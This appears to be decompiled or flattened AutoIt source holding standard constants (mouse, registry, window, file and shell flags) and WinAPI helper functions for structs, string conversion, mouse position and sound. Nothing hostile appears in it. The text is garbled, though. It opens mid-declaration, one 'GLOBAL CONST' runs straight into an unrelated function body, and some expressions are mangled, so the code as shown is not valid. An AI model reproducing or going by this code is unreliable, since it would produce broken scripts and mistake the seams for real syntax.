= 1 GLOBAL CONST $UBOUND_COLUMNS = 2 GLOBAL CONST $MOUSEEVENTF_ABSOLUTE = 32768 GLOBAL CONST $MOUSEEVENTF_MOVE = 1 GLOBAL CONST $MOUSEEVENTF_LEFTDOWN = 2 GLOBAL CONST $MOUSEEVENTF_LEFTUP = 4 GLOBAL CONST $MOUSEEVENTF_RIGHTDOWN = 8 GLOBAL CONST $MOUSEEVENTF_RIGHTUP = 16 GLOBAL CONST $MOUSEEVENTF_MIDDLEDOWN = 32 GLOBAL CONST $MOUSEEVENTF_MIDDLEUP = 64 GLOBAL CONST $MOUSEEVENTF_WHEEL = 2048 GLOBAL CONST $MOUSEEVENTF_XDOWN = 128 GLOBAL CONST $MOUSEEVENTF_XUP = 256 GLOBAL CONST $REG_NONE = 0 GLOBAL CONST $REG_SZ = 1 GLOBAL CONST $REG_EXPAND_SZ = 2 GLOBAL CONST $REG_BINARY = 3 GLOBAL CONST $REG_DWORD = 4 GLOBAL CONST $REG_DWORD_LITTLE_ENDIAN = 4 GLOBAL CONST $REG_DWORD_BIG_ENDIAN = 5 GLOBAL CONST $REG_LINK = 6 GLOBAL CONST $REG_MULTI_SZ = 7 GLOBAL CONST $REG_RESOURCE_LIST = 8 GLOBAL CONST $REG_FULL_RESOURCE_DESCRIPTOR = 9 GLOBAL CONST $REG_RESOURCE_REQUIREMENTS_LIST = 10 GLOBAL CONST $REG_QWORD = 11 GLOBAL CONST 
$REG_QWORD_LITTLE_ENDIAN = 11 GLOBAL CONST $HWND_BOTTOM = 1 GLOBAL CONST $HWND_NOTOPMOST = + 4294967294 GLOBAL CONST $HWND_TOP = 0 GLOBAL CONST $HWND_TOPMOST = + 4294967295 GLOBAL CONST $SWP_NOSIZE = 1 GLOBAL CONST $SWP_NOMOVE = 2 GLOBAL CONST $SWP_NOZORDER = 4 GLOBAL CONST $SWP_NOREDRAW = 8 GLOBAL CONST $SWP_NOACTIVATE = 16 GLOBAL CONST $SWP_FRAMECHANGED = 32 GLOBAL CONST $SWP_DRAWFRAME = 32 GLOBAL CONST $SWP_SHOWWINDOW = 64 GLOBAL CONST $SWP_HIDEWINDOW = 128 GLOBAL CONST $SWP_NOCOPYBITS = 256 GLOBAL CONST $SWP_NOOWNERZORDER = 512 GLOBAL CONST $SWP_NOREPOSITION = 512 GLOBAL CONST $SWP_NOSENDCHANGING = 1024 GLOBAL CONST $SWP_DEFERERASE = 8192 GLOBAL CONST $SWP_ASYNCWINDOWPOS = 16384 GLOBAL CONST $KEYWORD_DEFAULT = 1 GLOBAL CONST $KEYWORD_NULL = 2 GLOBAL CONST $DECLARED_LOCAL = + 4294967295 GLOBAL CONST $DECLARED_UNKNOWN = 0 GLOBAL CONST $DECLARED_GLOBAL = 1 GLOBAL CONST $ASSIGN_CREATE = 0 GLOBAL CONST $ASSIGN_FORCELOCAL = 1 GLOBAL CONST $ASSIGN_FORCEGLOBAL = 2 GLOBAL CONST $ASSIGN_EXISTFAIL = 4 GLOBAL CONST $BI_ENABLE = 0 GLOBAL CONST $BI_DISABLE = 1 GLOBAL CONST $BREAK_ENABLE = 1 GLOBAL CONST $BREAK_DISABLE = 0 GLOBAL CONST $CDTRAY_OPEN = "open" GLOBAL CONST $CDTRAY_CLOSED = "closed" GLOBAL CONST $SEND_DEFAULT = 0 GLOBAL CONST $SEND_RAW = 1 GLOBAL CONST $DIR_DEFAULT = 0 GLOBAL CONST $DIR_EXTENDED = 1 GLOBAL CONST $DIR_NORECURSE = 2 GLOBAL CONST $DIR_REMOVE = 1 GLOBAL CONST $DT_ALL = "ALL" GLOBAL CONST $DT_CDROM = "CDROM" GLOBAL CONST $DT_REMOVABLE = "REMOVABLE" GLOBAL CONST $DT_FIXED = "FIXED" GLOBAL CONST $DT_NETWORK = "NETWORK" GLOBAL CONST $DT_RAMDISK = "RAMDISK" GLOBAL CONST $DT_UNKNOWN = "UNKNOWN" GLOBAL CONST $DT_UNDEFINED = 1 GLOBAL CONST $DT_FAT = "FAT" GLOBAL CONST $DT_FAT32 = "FAT32" GLOBAL CONST $DT_EXFAT = "exFAT" GLOBAL CONST $DT_NTFS = "NTFS" GLOBAL CONST $DT_NWFS = "NWFS" GLOBAL CONST $DT_CDFS = "CDFS" GLOBAL CONST $DT_UDF = "UDF" GLOBAL CONST $DMA_DEFAULT = 0 GLOBAL CONST $DMA_PERSISTENT = 1 GLOBAL CONST $DMA_AUTHENTICATION = 8 GLOBAL CONST 
$DS_UNKNOWN = "UNKNOWN" GLOBAL CONST $DS_READY = "READY" GLOBAL CONST $DS_NOTREADY = "NOTREADY" GLOBAL CONST $DS_INVALID = "INVALID" GLOBAL CONST $MOUSE_CLICK_LEFT = "left" GLOBAL CONST $MOUSE_CLICK_RIGHT = "right" GLOBAL CONST $MOUSE_CLICK_MIDDLE = "middle" GLOBAL CONST $MOUSE_CLICK_MAIN = "main" GLOBAL CONST $MOUSE_CLICK_MENU = "menu" GLOBAL CONST $MOUSE_CLICK_PRIMARY = "primary" GLOBAL CONST $MOUSE_CLICK_SECONDARY = "secondary" GLOBAL CONST $MOUSE_WHEEL_UP = "up" GLOBAL CONST $MOUSE_WHEEL_DOWN = "down" GLOBAL CONST $NUMBER_AUTO = 0 GLOBAL CONST $NUMBER_32BIT = 1 GLOBAL CONST $NUMBER_64BIT = 2 GLOBAL CONST $NUMBER_DOUBLE = 3 GLOBAL CONST $OBJ_NAME = 1 GLOBAL CONST $OBJ_STRING = 2 GLOBAL CONST $OBJ_PROGID = 3 GLOBAL CONST $OBJ_FILE = 4 GLOBAL CONST $OBJ_MODULE = 5 GLOBAL CONST $OBJ_CLSID = 6 GLOBAL CONST $OBJ_IID = 7 GLOBAL CONST $EXITCLOSE_NORMAL = 0 GLOBAL CONST $EXITCLOSE_BYEXIT = 1 GLOBAL CONST $EXITCLOSE_BYCLICK = 2 GLOBAL CONST $EXITCLOSE_BYLOGOFF = 3 GLOBAL CONST $EXITCLOSE_BYSHUTDOWN = 4 GLOBAL CONST $PROCESS_STATS_MEMORY = 0 GLOBAL CONST $PROCESS_STATS_IO = 1 GLOBAL CONST $PROCESS_LOW = 0 GLOBAL CONST $PROCESS_BELOWNORMAL = 1 GLOBAL CONST $PROCESS_NORMAL = 2 GLOBAL CONST $PROCESS_ABOVENORMAL = 3 GLOBAL CONST $PROCESS_HIGH = 4 GLOBAL CONST $PROCESS_REALTIME = 5 GLOBAL CONST $RUN_LOGON_NOPROFILE = 0 GLOBAL CONST $RUN_LOGON_PROFILE = 1 GLOBAL CONST $RUN_LOGON_NETWORK = 2 GLOBAL CONST $RUN_LOGON_INHERIT = 4 GLOBAL CONST $SOUND_NOWAIT = 0 GLOBAL CONST $SOUND_WAIT = 1 GLOBAL CONST $SHEX_OPEN = "open" GLOBAL CONST $SHEX_EDIT = "edit" GLOBAL CONST $SHEX_PRINT = "print" GLOBAL CONST $SHEX_PROPERTIES = "properties" GLOBAL CONST $TCP_DATA_DEFAULT = 0 GLOBAL CONST $TCP_DATA_BINARY = 1 GLOBAL CONST $UDP_OPEN_DEFAULT = 0 GLOBAL CONST $UDP_OPEN_BROADCAST = 1 GLOBAL CONST $UDP_DATA_DEFAULT = 0 GLOBAL CONST $UDP_DATA_BINARY = 1 GLOBAL CONST $UDP_DATA_ARRAY = 2 GLOBAL CONST $TIP_NOICON = 0 GLOBAL CONST $TIP_INFOICON = 1 GLOBAL CONST $TIP_WARNINGICON = 2 GLOBAL CONST 
$TIP_ERRORICON = 3 GLOBAL CONST $TIP_BALLOON = 1 GLOBAL CONST $TIP_CENTER = 2 GLOBAL CONST $TIP_FORCEVISIBLE = 4 GLOBAL CONST $WINDOWS_NOONTOP = 0 GLOBAL CONST $WINDOWS_ONTOP = 1 GLOBAL CONST $WIN_STATE_EXISTS = 1 GLOBAL CONST $WIN_STATE_VISIBLE = 2 GLOBAL CONST $WIN_STATE_ENABLED = 4 GLOBAL CONST $WIN_STATE_ACTIVE = 8 GLOBAL CONST $WIN_STATE_MINIMIZED = 16 GLOBAL CONST $WIN_STATE_MAXIMIZED = 32 GLOBAL CONST $FC_NOOVERWRITE = 0 GLOBAL CONST $FC_OVERWRITE = 1 GLOBAL CONST $FC_CREATEPATH = 8 GLOBAL CONST $FT_MODIFIED = 0 GLOBAL CONST $FT_CREATED = 1 GLOBAL CONST $FT_ACCESSED = 2 GLOBAL CONST $FT_ARRAY = 0 GLOBAL CONST $FT_STRING = 1 GLOBAL CONST $FSF_CREATEBUTTON = 1 GLOBAL CONST $FSF_NEWDIALOG = 2 GLOBAL CONST $FSF_EDITCONTROL = 4 GLOBAL CONST $FT_NONRECURSIVE = 0 GLOBAL CONST $FT_RECURSIVE = 1 GLOBAL CONST $FO_READ = 0 GLOBAL CONST $FO_APPEND = 1 GLOBAL CONST $FO_OVERWRITE = 2 GLOBAL CONST $FO_CREATEPATH = 8 GLOBAL CONST $FO_BINARY = 16 GLOBAL CONST $FO_UNICODE = 32 GLOBAL CONST $FO_UTF16_LE = 32 GLOBAL CONST $FO_UTF16_BE = 64 GLOBAL CONST $FO_UTF8 = 128 GLOBAL CONST $FO_UTF8_NOBOM = 256 GLOBAL CONST $FO_ANSI = 512 GLOBAL CONST $FO_UTF16_LE_NOBOM = 1024 GLOBAL CONST $FO_UTF16_BE_NOBOM = 2048 GLOBAL CONST $FO_UTF8_FULL = 16384 GLOBAL CONST $FO_FULLFILE_DETECT = 16384 GLOBAL CONST $EOF = + 4294967295 GLOBAL CONST $FD_FILEMUSTEXIST = 1 GLOBAL CONST $FD_PATHMUSTEXIST = 2 GLOBAL CONST $FD_MULTISELECT = 4 GLOBAL CONST $FD_PROMPTCREATENEW = 8 GLOBAL CONST $FD_PROMPTOVERWRITE = 16 GLOBAL CONST $CREATE_NEW = 1 GLOBAL CONST $CREATE_ALWAYS = 2 GLOBAL CONST $OPEN_EXISTING = 3 GLOBAL CONST $OPEN_ALWAYS = 4 GLOBAL CONST $TRUNCATE_EXISTING = 5 GLOBAL CONST $INVALID_SET_FILE_POINTER = + 4294967295 GLOBAL CONST $FILE_BEGIN = 0 GLOBAL CONST $FILE_CURRENT = 1 GLOBAL CONST $FILE_END = 2 GLOBAL CONST $FILE_ATTRIBUTE_READONLY = 1 GLOBAL CONST $FILE_ATTRIBUTE_HIDDEN = 2 GLOBAL CONST $FILE_ATTRIBUTE_SYSTEM = 4 GLOBAL CONST $FILE_ATTRIBUTE_DIRECTORY = 16 GLOBAL CONST 
$FILE_ATTRIBUTE_ARCHIVE = 32 GLOBAL CONST $FILE_ATTRIBUTE_DEVICE = 64 GLOBAL CONST $FILE_ATTRIBUTE_NORMAL = 128 GLOBAL CONST $FILE_ATTRIBUTE_TEMPORARY = 256 GLOBAL CONST $FILE_ATTRIBUTE_SPARSE_FILE = 512 GLOBAL CONST $FILE_ATTRIBUTE_REPARSE_POINT = 1024 GLOBAL CONST $FILE_ATTRIBUTE_COMPRESSED = 2048 GLOBAL CONST $FILE_ATTRIBUTE_OFFLINE = 4096 GLOBAL CONST $FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 8192 GLOBAL CONST $FILE_ATTRIBUTE_ENCRYPTED = 16384 GLOBAL CONST $FILE_SHARE_READ = 1 GLOBAL CONST $FILE_SHARE_WRITE = 2 GLOBAL CONST $FILE_SHARE_DELETE = 4 GLOBAL CONST $FILE_SHARE_READWRITE = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE ) GLOBAL CONST $FILE_SHARE_ANY = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE , $FILE_SHARE_DELETE ) GLOBAL CONST $GENERIC_ALL = 268435456 GLOBAL CONST $GENERIC_EXECUTE = 536870912 GLOBAL CONST $GENERIC_WRITE = 1073741824 GLOBAL CONST $GENERIC_READ = 2147483648 GLOBAL CONST $GENERIC_READWRITE = BITOR ($GENERIC_READ , $GENERIC_WRITE ) GLOBAL CONST $FILE_ENCODING_UTF16LE = 32 GLOBAL CONST $FE_ENTIRE_UTF8 = 1 GLOBAL CONST $FE_PARTIALFIRST_UTF8 = 2 GLOBAL CONST $FN_FULLPATH = 0 GLOBAL CONST $FN_RELATIVEPATH = 1 GLOBAL CONST $FV_COMMENTS = "Comments" GLOBAL CONST $FV_COMPANYNAME = "CompanyName" GLOBAL CONST $FV_FILEDESCRIPTION = "FileDescription" GLOBAL CONST $FV_FILEVERSION = "FileVersion" GLOBAL CONST $FV_INTERNALNAME = "InternalName" GLOBAL CONST $FV_LEGALCOPYRIGHT = "LegalCopyright" GLOBAL CONST $FV_LEGALTRADEMARKS = "LegalTrademarks" GLOBAL CONST $FV_ORIGINALFILENAME = "OriginalFilename" GLOBAL CONST $FV_PRODUCTNAME = "ProductName" GLOBAL CONST $FV_PRODUCTVERSION = "ProductVersion" GLOBAL CONST $FV_PRIVATEBUILD = "PrivateBuild" GLOBAL CONST $FV_SPECIALBUILD = "SpecialBuild" GLOBAL CONST $FRTA_NOCOUNT = 0 GLOBAL CONST $FRTA_COUNT = 1 GLOBAL CONST $FRTA_INTARRAYS = 2 GLOBAL CONST $FRTA_ENTIRESPLIT = 4 GLOBAL CONST $FLTA_FILESFOLDERS = 0 GLOBAL CONST $FLTA_FILES = 1 GLOBAL CONST $FLTA_FOLDERS = 2 GLOBAL CONST $FLTAR_FILESFOLDERS = 0 GLOBAL CONST 
($IVALUE ) LOCAL $TSTRUCT1 = DLLSTRUCTCREATE ("int64;int64" ) LOCAL $TSTRUCT2 = DLLSTRUCTCREATE ("byte[8];byte[8]" , DLLSTRUCTGETPTR ($TSTRUCT1 ) ) DLLSTRUCTSETDATA ($TSTRUCT1 , 1 , $IVALUE ) FOR $I = 1 TO 8 DLLSTRUCTSETDATA ($TSTRUCT2 , 2 , DLLSTRUCTGETDATA ($TSTRUCT2 , 1 , 9 - $I ) , $I ) NEXT RETURN DLLSTRUCTGETDATA ($TSTRUCT1 , 2 ) ENDFUNC FUNC _WINAPI_SWAPWORD ($IVALUE ) LOCAL $TSTRUCT1 = DLLSTRUCTCREATE ("word;word" ) LOCAL $TSTRUCT2 = DLLSTRUCTCREATE ("byte[2];byte[2]" , DLLSTRUCTGETPTR ($TSTRUCT1 ) ) DLLSTRUCTSETDATA ($TSTRUCT1 , 1 , $IVALUE ) FOR $I = 1 TO 2 DLLSTRUCTSETDATA ($TSTRUCT2 , 2 , DLLSTRUCTGETDATA ($TSTRUCT2 , 1 , 3 - $I ) , $I ) NEXT RETURN DLLSTRUCTGETDATA ($TSTRUCT1 , 2 ) ENDFUNC FUNC _WINAPI_WIDECHARTOMULTIBYTE ($VUNICODE , $ICODEPAGE = 0 , $BRETNOSTRUCT = TRUE , $BRETBINARY = FALSE ) LOCAL $SUNICODETYPE = "wstr" IF NOT ISSTRING ($VUNICODE ) THEN $SUNICODETYPE = "struct*" LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "WideCharToMultiByte" , "uint" , $ICODEPAGE , "dword" , 0 , $SUNICODETYPE , $VUNICODE , "int" , + 4294967295 , "ptr" , 0 , "int" , 0 , "ptr" , 0 , "ptr" , 0 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , "" ) LOCAL $TMULTIBYTE = DLLSTRUCTCREATE ((($BRETBINARY ) ("byte" ) ("char" ) ) & "[" & $ARESULT [0 ] & "]" ) $ARESULT = DLLCALL ("kernel32.dll" , "int" , "WideCharToMultiByte" , "uint" , $ICODEPAGE , "dword" , 0 , $SUNICODETYPE , $VUNICODE , "int" , + 4294967295 , "struct*" , $TMULTIBYTE , "int" , $ARESULT [0 ] , "ptr" , 0 , "ptr" , 0 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) IF $BRETNOSTRUCT THEN RETURN DLLSTRUCTGETDATA ($TMULTIBYTE , 1 ) RETURN $TMULTIBYTE ENDFUNC FUNC _WINAPI_WORDTOSHORT ($IVALUE ) IF BITAND ($IVALUE , 32768 ) THEN RETURN BITOR ($IVALUE , 4294934528 ) ENDIF RETURN BITAND ($IVALUE , 32767 ) ENDFUNC #EndRegion Public Functions #Region Global Variables and Constants #EndRegion Global Variables and Constants #Region Functions list 
#EndRegion Functions list #Region Public Functions FUNC _WINAPI_ARRAYTOSTRUCT (CONST BYREF $ADATA , $ISTART = 0 , $IEND = + 4294967295 ) IF __CHECKERRORARRAYBOUNDS ($ADATA , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $TAGSTRUCT = "" FOR $I = $ISTART TO $IEND $TAGSTRUCT &= "wchar[" & (STRINGLEN ($ADATA [$I ] ) + 1 ) & "];" NEXT LOCAL $TDATA = DLLSTRUCTCREATE ($TAGSTRUCT & "wchar[1]" ) LOCAL $ICOUNT = 1 FOR $I = $ISTART TO $IEND DLLSTRUCTSETDATA ($TDATA , $ICOUNT , $ADATA [$I ] ) $ICOUNT += 1 NEXT DLLSTRUCTSETDATA ($TDATA , $ICOUNT , CHRW (0 ) ) RETURN $TDATA ENDFUNC FUNC _WINAPI_CREATEMARGINS ($ILEFTWIDTH , $IRIGHTWIDTH , $ITOPHEIGHT , $IBOTTOMHEIGHT ) LOCAL $TMARGINS = DLLSTRUCTCREATE ($TAGMARGINS ) DLLSTRUCTSETDATA ($TMARGINS , 1 , $ILEFTWIDTH ) DLLSTRUCTSETDATA ($TMARGINS , 2 , $IRIGHTWIDTH ) DLLSTRUCTSETDATA ($TMARGINS , 3 , $ITOPHEIGHT ) DLLSTRUCTSETDATA ($TMARGINS , 4 , $IBOTTOMHEIGHT ) RETURN $TMARGINS ENDFUNC FUNC _WINAPI_CREATEPOINT ($IX , $IY ) LOCAL $TPOINT = DLLSTRUCTCREATE ($TAGPOINT ) DLLSTRUCTSETDATA ($TPOINT , 1 , $IX ) DLLSTRUCTSETDATA ($TPOINT , 2 , $IY ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_CREATERECT ($ILEFT , $ITOP , $IRIGHT , $IBOTTOM ) LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) DLLSTRUCTSETDATA ($TRECT , 1 , $ILEFT ) DLLSTRUCTSETDATA ($TRECT , 2 , $ITOP ) DLLSTRUCTSETDATA ($TRECT , 3 , $IRIGHT ) DLLSTRUCTSETDATA ($TRECT , 4 , $IBOTTOM ) RETURN $TRECT ENDFUNC FUNC _WINAPI_CREATERECTEX ($IX , $IY , $IWIDTH , $IHEIGHT ) LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) DLLSTRUCTSETDATA ($TRECT , 1 , $IX ) DLLSTRUCTSETDATA ($TRECT , 2 , $IY ) DLLSTRUCTSETDATA ($TRECT , 3 , $IX + $IWIDTH ) DLLSTRUCTSETDATA ($TRECT , 4 , $IY + $IHEIGHT ) RETURN $TRECT ENDFUNC FUNC _WINAPI_CREATESIZE ($IWIDTH , $IHEIGHT ) LOCAL $TSIZE = DLLSTRUCTCREATE ($TAGSIZE ) DLLSTRUCTSETDATA ($TSIZE , 1 , $IWIDTH ) DLLSTRUCTSETDATA ($TSIZE , 2 , $IHEIGHT ) RETURN $TSIZE ENDFUNC FUNC _WINAPI_COPYSTRUCT ($TSTRUCT , $SSTRUCT = "" ) LOCAL $ISIZE = 
DLLSTRUCTGETSIZE ($TSTRUCT ) IF NOT $ISIZE THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $TRESULT IF NOT STRINGSTRIPWS ($SSTRUCT , $STR_STRIPLEADING + $STR_STRIPTRAILING + $STR_STRIPSPACES ) THEN $TRESULT = DLLSTRUCTCREATE ("byte[" & $ISIZE & "]" ) ELSE $TRESULT = DLLSTRUCTCREATE ($SSTRUCT ) ENDIF IF DLLSTRUCTGETSIZE ($TRESULT ) < $ISIZE THEN RETURN SETERROR (2 , 0 , 0 ) _WINAPI_MOVEMEMORY ($TRESULT , $TSTRUCT , $ISIZE ) RETURN $TRESULT ENDFUNC FUNC _WINAPI_GETEXTENDED () RETURN $__G_VEXT ENDFUNC FUNC _WINAPI_GETMOUSEPOS ($BTOCLIENT = FALSE , $HWND = 0 ) LOCAL $IMODE = OPT ("MouseCoordMode" , 1 ) LOCAL $APOS = MOUSEGETPOS () OPT ("MouseCoordMode" , $IMODE ) LOCAL $TPOINT = DLLSTRUCTCREATE ($TAGPOINT ) DLLSTRUCTSETDATA ($TPOINT , "X" , $APOS [0 ] ) DLLSTRUCTSETDATA ($TPOINT , "Y" , $APOS [1 ] ) IF $BTOCLIENT AND NOT _WINAPI_SCREENTOCLIENT ($HWND , $TPOINT ) THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_GETMOUSEPOSX ($BTOCLIENT = FALSE , $HWND = 0 ) LOCAL $TPOINT = _WINAPI_GETMOUSEPOS ($BTOCLIENT , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TPOINT , "X" ) ENDFUNC FUNC _WINAPI_GETMOUSEPOSY ($BTOCLIENT = FALSE , $HWND = 0 ) LOCAL $TPOINT = _WINAPI_GETMOUSEPOS ($BTOCLIENT , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TPOINT , "Y" ) ENDFUNC FUNC _WINAPI_MULDIV ($INUMBER , $INUMERATOR , $IDENOMINATOR ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "MulDiv" , "int" , $INUMBER , "int" , $INUMERATOR , "int" , $IDENOMINATOR ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_PLAYSOUND ($SSOUND , $IFLAGS = $SND_SYSTEM_NOSTOP , $HINSTANCE = 0 ) LOCAL $STYPEOFSOUND = "ptr" IF $SSOUND THEN IF ISSTRING ($SSOUND ) THEN $STYPEOFSOUND = "wstr" ENDIF ELSE $SSOUND = 0 $IFLAGS = 0 ENDIF LOCAL $ARET = DLLCALL ("winmm.dll" , "bool" , "PlaySoundW" , $STYPEOFSOUND , $SSOUND , "handle" , $HINSTANCE 
, "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_STRINGLENA (CONST BYREF $TSTRING ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "lstrlenA" , "struct*" , $TSTRING ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_STRINGLENW (CONST BYREF $TSTRING ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "lstrlenW" , "struct*" , $TSTRING ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_STRUCTTOARRAY (BYREF $TSTRUCT , $IITEMS = 0 ) LOCAL $ISIZE = 2 * FLOOR (DLLSTRUCTGETSIZE ($TSTRUCT ) / 2 ) LOCAL $PSTRUCT = DLLSTRUCTGETPTR ($TSTRUCT ) IF NOT $ISIZE OR NOT $PSTRUCT THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $TDATA , $ILENGTH , $IOFFSET = 0 LOCAL $ARESULT [101 ] = [0 ] WHILE 1 $ILENGTH = _WINAPI_STRLEN ($PSTRUCT + $IOFFSET ) IF NOT $ILENGTH THEN EXITLOOP ENDIF IF 2 * (1 + $ILENGTH ) + $IOFFSET > $ISIZE THEN RETURN SETERROR (3 , 0 , 0 ) $TDATA = DLLSTRUCTCREATE ("wchar[" & (1 + $ILENGTH ) & "]" , $PSTRUCT + $IOFFSET ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , 0 , 0 ) __INC ($ARESULT ) $ARESULT [$ARESULT [0 ] ] = DLLSTRUCTGETDATA ($TDATA , 1 ) IF $ARESULT [0 ] = $IITEMS THEN EXITLOOP ENDIF $IOFFSET += 2 * (1 + $ILENGTH ) IF $IOFFSET >= $ISIZE THEN RETURN SETERROR (3 , 0 , 0 ) WEND IF NOT $ARESULT [0 ] THEN RETURN SETERROR (2 , 0 , 0 ) __INC ($ARESULT , + 4294967295 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_UNIONSTRUCT ($TSTRUCT1 , $TSTRUCT2 , $SSTRUCT = "" ) LOCAL $ASIZE [2 ] = [DLLSTRUCTGETSIZE ($TSTRUCT1 ) , DLLSTRUCTGETSIZE ($TSTRUCT2 ) ] IF NOT $ASIZE [0 ] OR NOT $ASIZE [1 ] THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $TRESULT IF NOT STRINGSTRIPWS ($SSTRUCT , $STR_STRIPLEADING + $STR_STRIPTRAILING + $STR_STRIPSPACES ) THEN $TRESULT = DLLSTRUCTCREATE ("byte[" & ($ASIZE [0 ] + $ASIZE [1 ] ) & "]" ) ELSE $TRESULT = DLLSTRUCTCREATE ($SSTRUCT ) ENDIF IF DLLSTRUCTGETSIZE ($TRESULT ) < ($ASIZE [0 ] + 
$ASIZE [1 ] ) THEN RETURN SETERROR (2 , 0 , 0 ) _WINAPI_MOVEMEMORY ($TRESULT , $TSTRUCT1 , $ASIZE [0 ] ) _WINAPI_MOVEMEMORY (DLLSTRUCTGETPTR ($TRESULT ) + $ASIZE [0 ] , $TSTRUCT2 , $ASIZE [1 ] ) RETURN $TRESULT ENDFUNC #EndRegion Public Functions GLOBAL CONST $DLLVER_PLATFORM_WINDOWS = 1 GLOBAL CONST $DLLVER_PLATFORM_NT = 2 GLOBAL CONST $SHCNE_ALLEVENTS = 2147483647 GLOBAL CONST $SHCNE_ASSOCCHANGED = 134217728 GLOBAL CONST $SHCNE_ATTRIBUTES = 2048 GLOBAL CONST $SHCNE_CREATE = 2 GLOBAL CONST $SHCNE_DELETE = 4 GLOBAL CONST $SHCNE_DRIVEADD = 256 GLOBAL CONST $SHCNE_DRIVEADDGUI = 65536 GLOBAL CONST $SHCNE_DRIVEREMOVED = 128 GLOBAL CONST $SHCNE_EXTENDED_EVENT = 67108864 GLOBAL CONST $SHCNE_FREESPACE = 262144 GLOBAL CONST $SHCNE_MEDIAINSERTED = 32 GLOBAL CONST $SHCNE_MEDIAREMOVED = 64 GLOBAL CONST $SHCNE_MKDIR = 8 GLOBAL CONST $SHCNE_NETSHARE = 512 GLOBAL CONST $SHCNE_NETUNSHARE = 1024 GLOBAL CONST $SHCNE_RENAMEFOLDER = 131072 GLOBAL CONST $SHCNE_RENAMEITEM = 1 GLOBAL CONST $SHCNE_RMDIR = 16 GLOBAL CONST $SHCNE_SERVERDISCONNECT = 16384 GLOBAL CONST $SHCNE_UPDATEDIR = 4096 GLOBAL CONST $SHCNE_UPDATEIMAGE = 32768 GLOBAL CONST $SHCNE_UPDATEITEM = 8192 GLOBAL CONST $SHCNE_DISKEVENTS = 145439 GLOBAL CONST $SHCNE_GLOBALEVENTS = 201687520 GLOBAL CONST $SHCNE_INTERRUPT = 2147483648 GLOBAL CONST $SHCNF_DWORD = 3 GLOBAL CONST $SHCNF_IDLIST = 0 GLOBAL CONST $SHCNF_PATH = 1 GLOBAL CONST $SHCNF_PRINTER = 2 GLOBAL CONST $SHCNF_FLUSH = 4096 GLOBAL CONST $SHCNF_FLUSHNOWAIT = 8192 GLOBAL CONST $SHCNF_NOTIFYRECURSIVE = 65536 GLOBAL CONST $SHCNRF_INTERRUPTLEVEL = 1 GLOBAL CONST $SHCNRF_SHELLLEVEL = 2 GLOBAL CONST $SHCNRF_RECURSIVEINTERRUPT = 4096 GLOBAL CONST $SHCNRF_NEWDELIVERY = 32768 GLOBAL CONST $SHERB_NOCONFIRMATION = 1 GLOBAL CONST $SHERB_NOPROGRESSUI = 2 GLOBAL CONST $SHERB_NOSOUND = 4 GLOBAL CONST $SHERB_NO_UI = BITOR ($SHERB_NOCONFIRMATION , $SHERB_NOPROGRESSUI , $SHERB_NOSOUND ) GLOBAL CONST $SEE_MASK_DEFAULT = 0 GLOBAL CONST $SEE_MASK_CLASSNAME = 1 GLOBAL CONST 
$SEE_MASK_CLASSKEY = 3 GLOBAL CONST $SEE_MASK_IDLIST = 4 GLOBAL CONST $SEE_MASK_INVOKEIDLIST = 12 GLOBAL CONST $SEE_MASK_ICON = 16 GLOBAL CONST $SEE_MASK_HOTKEY = 32 GLOBAL CONST $SEE_MASK_NOCLOSEPROCESS = 64 GLOBAL CONST $SEE_MASK_CONNECTNETDRV = 128 GLOBAL CONST $SEE_MASK_NOASYNC = 256 GLOBAL CONST $SEE_MASK_FLAG_DDEWAIT = $SEE_MASK_NOASYNC GLOBAL CONST $SEE_MASK_DOENVSUBST = 512 GLOBAL CONST $SEE_MASK_FLAG_NO_UI = 1024 GLOBAL CONST $SEE_MASK_UNICODE = 16384 GLOBAL CONST $SEE_MASK_NO_CONSOLE = 32768 GLOBAL CONST $SEE_MASK_ASYNCOK = 1048576 GLOBAL CONST $SEE_MASK_NOQUERYCLASSSTORE = 16777216 GLOBAL CONST $SEE_MASK_HMONITOR = 2097152 GLOBAL CONST $SEE_MASK_NOZONECHECKS = 8388608 GLOBAL CONST $SEE_MASK_WAITFORINPUTIDLE = 33554432 GLOBAL CONST $SEE_MASK_FLAG_LOG_USAGE = 67108864 GLOBAL CONST $SE_ERR_ACCESSDENIED = 5 GLOBAL CONST $SE_ERR_ASSOCINCOMPLETE = 27 GLOBAL CONST $SE_ERR_DDEBUSY = 30 GLOBAL CONST $SE_ERR_DDEFAIL = 29 GLOBAL CONST 